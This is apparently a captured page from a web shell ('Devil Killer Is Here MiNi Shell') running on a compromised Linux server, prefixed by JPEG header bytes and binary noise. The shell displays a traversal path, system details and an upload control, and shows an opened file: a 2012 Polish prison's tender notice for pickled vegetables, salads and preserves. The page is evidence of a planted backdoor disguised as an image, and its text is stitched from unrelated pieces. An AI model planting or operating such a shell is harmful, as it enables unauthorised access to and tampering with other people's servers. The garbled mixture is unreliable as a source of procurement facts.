JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120827/184243-N-2012.html

<p class="kh_header"><b>Rawicz: Sukcesywne dostawy przetworów warzywnych i owocowych</b><br>
<b>Numer ogłoszenia: 184243 - 2012; data zamieszczenia: 27.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Rawiczu , ul. 17 Stycznia 28, 63-900 Rawicz, woj. wielkopolskie, tel. 065 5468500, 5468551,53,56, faks 065 5454266.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.zp.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Orgaznizacyjna Więziennictwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy przetworów warzywnych i owocowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są:
sukcesywne dostawy przetworów warzywnych i owocowych 

Zamawiający podzielił przedmiot zamówienia na trzy części (zadania):
-zadanie nr 1: Sukcesywne dostawy przetworów warzywnych kiszonych,
-zadanie nr 2: Sukcesywne dostawy sałatek warzywnych,
-zadanie nr 3: Sukcesywne dostawy przetworów owocowych i warzywnych,

Szacunkowe ilości przedmiotu zamówienia dla zadania numer 1:

Kapusta kwaszona		-	  15 000  kg
Ogórki kwaszone 		-	    8 000  kg

Szacunkowe ilości przedmiotu zamówienia dla zadania numer 2:

Sałatka warzywna 		-   4 000  kg
Sałatka szwedzka     	-   4 000  kg
Surówka z pora  	 	-   1 500  kg
Leczo pieczarkowe 	-   3 500  kg

Szacunkowe ilości przedmiotu zamówienia dla zadania numer 3:

Koncentrat pomidorowy		 - 	 4 800  kg
Groszek konserwowy 		 -	 2 300  kg 
Kukurydza konserwowa		 - 	 2 200  kg
Chrzan tarty 		 	 -	 1 100  kg 
Przecier jabłkowy		 	 - 	    650  kg
Sojowy granulat 		 	 -	    650  kg 
Sojowa kostka		 	 - 	 1 100  kg
Sojowa krajanka		 	 -	    300  kg 
Kotlety sojowe		 	 - 	    600  kg
Dżem truskawkowy 		 -	 3 800  kg 
Powidła śliwkowe		 	 - 	 2 100  kg
Syrop owocowy		 	 -	 2 200  kg 
Marmolada		 	 -	 2 800  kg.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.10.00-7, 15.33.11.42-4, 15.32.10.00-4, 15.33.14.25-2, 15.33.22.30-5, 15.33.22.90-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu, jeżeli wszystkie dokumenty i oświadczenia (wymienione w punkcie VI SIWZ), przedstawione w ofercie będą prawidłowo sporządzone, kompletne, aktualne oraz podpisane przez osoby uprawnione. Zamawiający przy ocenie spełnienia warunków udziału w postępowaniu zastosuje kryterium:spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu, jeżeli wszystkie dokumenty i oświadczenia (wymienione w punkcie VI SIWZ), przedstawione w ofercie będą prawidłowo sporządzone, kompletne, aktualne oraz podpisane przez osoby uprawnione. Zamawiający przy ocenie spełnienia warunków udziału w postępowaniu zastosuje kryterium:spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu, jeżeli wszystkie dokumenty i oświadczenia (wymienione w punkcie VI SIWZ), przedstawione w ofercie będą prawidłowo sporządzone, kompletne, aktualne oraz podpisane przez osoby uprawnione. Zamawiający przy ocenie spełnienia warunków udziału w postępowaniu zastosuje kryterium:spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu, jeżeli wszystkie dokumenty i oświadczenia (wymienione w punkcie VI SIWZ), przedstawione w ofercie będą prawidłowo sporządzone, kompletne, aktualne oraz podpisane przez osoby uprawnione. Zamawiający przy ocenie spełnienia warunków udziału w postępowaniu zastosuje kryterium:spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu, jeżeli wszystkie dokumenty i oświadczenia (wymienione w punkcie VI SIWZ), przedstawione w ofercie będą prawidłowo sporządzone, kompletne, aktualne oraz podpisane przez osoby uprawnione. Zamawiający przy ocenie spełnienia warunków udziału w postępowaniu zastosuje kryterium:spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Rawiczu, ul. 17-go Stycznia 28.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.09.2012 godzina 09:00, miejsce: Zakład Karny w Rawiczu, ul. 17-go Stycznia 28, w sekretariacie..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sukcesywne dostawy przetworów warzywnych i kiszonych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1: Sukcesywne dostawy przetworów warzywnych kiszonych

W skład niniejszego przedmiotu zamówienia wchodzą następujące wyroby:

1) KAPUSTA KWASZONA:
-produkt spożywczy otrzymany z kapusty głowiastej białej, oczyszczonej z liści zewnętrznych, pokrojonej, zasolonej i poddanej naturalnemu procesowi fermentacji mlekowej z 5% wsadem marchwi;
-struktura - kapusta pokrojona na skrawki, gdzie odległość mierzona między krawędziami cięcia na powierzchni liścia wynosi nie więcej niż 2 - 3 mm, skrawki jędrne, chrupkie;
-barwa skrawków - biała lub kremowo biała z odcieniem żółtawym;
-smak i zapach - charakterystyczny dla kapusty prawidłowo ukwaszonej, aromatyczny, słodko-kwaśny;
-wygląd soku - jasnoszary, opalizujący;
-zawartość soku - w stosunku do masy netto powinna odpowiadać 15% wagi tzn. lekko uciskana pokrywa się sokiem;
-kwasowość ogólna w przeliczeniu na kwas mlekowy 1,0 - 1,8% wagi;
-zawartość soli kuchennej 1,2 - 2,5% wagi;
-cechy dyskwalifikujące: obce posmaki, zapachy, smak mocno słony, niekwaśny, stęchły, objawy pleśnienia, psucia, niedostateczna ilość soku (wysuszenie kapusty), obecność bakterii salmonelli, gronkowców chorobotwórczych i z grupy coli, obecność szkodników żywych, martwych, oraz ich pozostałości, brak oznakowania opakowań, ich uszkodzenia mechaniczne, zabrudzenia;
-opakowanie jednostkowe: beczka z tworzywa sztucznego (materiał opakowaniowy dopuszczony do kontaktu z żywnością)  do 100 kg;
-Produkt musi odpowiadać PN.
-Termin przydatności do spożycia powinien wynosić nie mniej niż 1 miesiąc od daty dostawy.

2) OGÓRKI KWASZONE: 
produkt spożywczy otrzymany ze świeżych ogórków, przypraw aromatyczno - smakowych, zalanych zalewą z dodatkiem soli i poddanych naturalnemu procesowi fermentacji mlekowej, z ewentualnym dodatkiem kwasu sorbowego - w przypadku stosowania opakowań nie hermetycznych lub utrwalony w procesie pasteryzacji w opakowaniach hermetycznych;
-struktura - dość luźno ułożone całe ogórki, jędrne, chrupkie;
-smak i zapach - charakterystyczny dla ogórków prawidłowo ukwaszonych, aromatyczny, słono kwaśny, ogórki powinny być proste, w kształcie foremnym zbliżonym do walca, o barwie oliwkowo zielonej o różnych odcieniach, powierzchnia wolna od uszkodzeń mechanicznych i plam chorobowych, wielkości od 6 do 15 cm;
-wygląd zalewy - od białoszarej do zielonkawo szarej, lekko mętny, dopuszcza się osad pochodzący z przypraw (kopru, chrzanu, gorczycy, czosnku itp.);
-zawartość soli kuchennej 1,5 - 3,0 % wagi;
-cechy dyskwalifikujące: obce posmaki, zapachy, smak mocno słony, niekwaśny, stęchły, objawy zapleśnienia, psucia, ich nadmierna miękkość, obecność bakterii salmonelii, gronkowców chorobotwórczych i z grupy coli, obecność szkodników żywych, martwych oraz ich pozostałości, brak oznakowania opakowań, ich uszkodzenia mechaniczne, zabrudzenia;
-opakowanie jednostkowe: beczka z tworzywa sztucznego (materiał opakowaniowy dopuszczony do kontaktu z żywnością) do 100 kg,
-Produkt musi odpowiadać PN.
-Termin przydatności do spożycia powinien wynosić nie mniej niż 1 miesiąc od daty dostawy.

Szacunkowe ilości przedmiotu zamówienia:

Kapusta kwaszona		-	  15 000  kg
Ogórki kwaszone 		-	    8 000  kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.10.00-7, 15.33.11.42-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sukcesywne dostawy sałatek warzywnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2: Sukcesywne dostawy sałatek warzywnych

W skład niniejszego przedmiotu zamówienia wchodzą następujące wyroby:

1)  SAŁATKA WARZYWNA:
Produkt spożywczy otrzymany z pokrojonych warzyw, z dodatkiem przypraw, utrwalony przez pasteryzację.
     Wymagania klasyfikacyjne:
- smak i zapach - charakterystyczny dla użytych składników, bez zapachów i posmaków obcych,
- konsystencja  - gęsta mieszanka warzywna.
- masa odcieku nie większa niż 45% masy całkowitej,
Cechy dyskwalifikujące:
- obce posmaki, zapachy, smak mocno słony, kwaśny, stęchły, niedostateczna ocena organoleptyczna produktu,
- objawy zapleśnienia, psucia,
- obecność zanieczyszczeń mechanicznych,
- brak oznakowania opakowań, ich uszkodzenia mechaniczne, zabrudzenia,
Opakowanie jednostkowe - słoiki, wiaderka lub inne o pojemności do 10 kg,
Inne wymagania: Termin przydatności do spożycia min. 3 miesięce od daty dostawy.
Produkt musi odpowiadać PN.

2)  SAŁATKA SZWEDZKA:
Produkt spożywczy otrzymany z pokrojonych w talarki ogórków, zalany octem, z dodatkiem gorczycy, cukru, cebuli
soli itp.
Wymagania klasyfikacyjne:
- smak i zapach - charakterystyczny dla użytych składników, słodko - kwaśny, bez zapachów i posmaków obcych,
- wygląd  - pokrojone w plastry ogórki z dodatkami w zalewie octowej.
- masa odcieku nie większa niż 41% masy całkowitej,
Cechy dyskwalifikujące:
- obce posmaki, zapachy, niedostateczna ocena organoleptyczna produktu,
- objawy zapleśnienia, psucia,
- obecność zanieczyszczeń mechanicznych,
- brak oznakowania opakowań, ich uszkodzenia mechaniczne, zabrudzenia,
Opakowanie jednostkowe - słoiki o pojemności do 2 kg,
Inne wymagania: Termin przydatności do spożycia min. 3 miesięce od daty dostawy.
Produkt musi odpowiadać PN.

3)  SURÓWKA Z PORA:
Produkt spożywczy otrzymany z pokrojonej pory, możliwość dodania takich składników jak jabłko, marchew itp.,
składniki doprawione przyprawami, bez majonezu, pasteryzowana.
Wymagania klasyfikacyjne:
- smak i zapach - charakterystyczny dla użytych składników, bez zapachów i posmaków obcych,
- konsystencja  - gęsta,
Cechy dyskwalifikujące:
- obce posmaki, zapachy, niedostateczna ocena organoleptyczna produktu,
- objawy zapleśnienia, psucia,
- obecność zanieczyszczeń mechanicznych,
- brak oznakowania opakowań, ich uszkodzenia mechaniczne, zabrudzenia,
Opakowanie jednostkowe - słoiki lub inne opakowania o pojemności do 10 kg,
Inne wymagania: Termin przydatności do spożycia min. 3 miesięce od daty dostawy.
Produkt musi odpowiadać PN.

4)  LECZO PIECZARKOWE:
Produkt spożywczy otrzymany ze świeżych warzyw, pokrojonych pieczarek z dodatkiem soli kuchennej,utrwalony przez pasteryzację.
Wymagania klasyfikacyjne:
- smak i zapach - charakterystyczny dla użytych składników, bez zapachów i posmaków obcych,
- konsystencja - półpłynna do gęstej, z widocznymi kawałkami warzyw i pieczarek.
Cechy dyskwalifikujące:
- obce posmaki, zapachy, smak mocno słony, kwaśny, stęchły, niedostateczna ocena organoleptyczna produktu,
- objawy zapleśnienia, psucia,
- obecność zanieczyszczeń mechanicznych,
- brak oznakowania opakowań, ich uszkodzenia mechaniczne, zabrudzenia,
Opakowanie jednostkowe - słoik do 2,0 kg lub puszki do 5,0 kg,
Inne wymagania: Termin przydatności do spożycia min. 3 miesięce od daty dostawy.
Produkt musi odpowiadać PN.

Szacunkowe ilości przedmiotu zamówienia:

Sałatka warzywna 		-   4 000  kg
Sałatka szwedzka     	-   4 000  kg
Surówka z pora  	 	-   1 500  kg
Leczo pieczarkowe 	-   3 500  kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.10.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sukcesywne dostawy przetworów owocowych i warzywnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3: Sukcesywne dostawy przetworów owocowych i warzywnych

W skład niniejszego przedmiotu zamówienia wchodzą następujące wyroby:

1)  KONCENTRAT POMIDOROWY:
Wymagania klasyfikacyjne:
- struktura i konsystencja: jednolita, półpłynna do gęstej, bez rozdziału składników, lekko kremowa,
- barwa: pomarańczowo - bordowa, właściwa dla zastosowanych surowców i dodanych składników smakowo - zapachowych, dopuszcza się występowanie czarnych punkcików pochodzących od zastosowanych przypraw, jednolita w całej masie,
- smak i zapach: kwaśny, słonawy, właściwy dla koncentratu z wyczuwalnym zapachem i smakiem pomidorów,
- zawartość koncentratu nie mniej niż 29%,
- koncentrat pakowany w słoje szklane do 1 kg (materiał opakowaniowy dopuszczony do kontaktu z żywnością),
Dopuszczalne tolerancje:
- dopuszcza się nieznaczną ilość większych cząstek przypraw,
Cechy dyskwalifikujące:
- obce posmaki, zapachy, zmiana barwy, jej niejednolitość,
- trwałe rozwarstwienie składników, objawy pleśnienia, fermentacji, psucia,
- zaniżona zawartość masy suchej, przekroczenie normy zawartości wody i metali,
- zanieczyszczenia mechaniczne,
- brak oznakowania ketchupu, ich uszkodzenia mechaniczne, zabrudzenia.
Opakowanie:
 -  opakowanie jednostkowe - słoje szklane do 1 kg,
Inne wymagania: Termin przydatności do spożycia min. 3 miesiące od daty dostawy.
Produkt musi odpowiadać PN.

2)  GROSZEK KONSERWOWY:
 Produkt otrzymany z ziaren groszku zielonego zalanych roztworem cukru i soli kuchennej, utrwalony termicznie.
 Wymagania klasyfikacyjne:
- wygląd - ziarna całe, nieuszkodzone o barwie zielonej,
- smak i zapach - słonawo-słodki, charakterystyczny dla groszku zielonego, bez posmaków i zapachów obcych,
Cechy dyskwalifikujące:
- obce posmaki, zapachy, smak stęchły, mdły, niedopuszczalny smak obcy świadczący o nieświeżości,
- niedopuszczalne zawilgocenia,
- objawy psucia, pleśnienia,
- uszkodzenia mechaniczne opakowań, brak oznakowania, nieszczelność,
- obecność szkodników żywych, martwych oraz ich pozostałości,
Opakowanie:
-opakowanie jednostkowe stanowią puszki metalowe do 3 kg, 
Inne wymagania: Termin przydatności do spożycia min. 3 miesiące od daty dostawy
 Produkt musi odpowiadać PN.

3)  KUKURYDZA KONSERWOWA:
     Produkt otrzymany z ziaren kukurydzy cukrowej zalanych roztworem cukru i soli, utrwalony termicznie.
Wymagania klasyfikacyjne:
- wygląd - ziarna całe, nieuszkodzone o barwie żółtobiałej i żółtej, zalewa opalizująca lub mętna z osadem tkanki
  roślinnej na dnie opakowania,
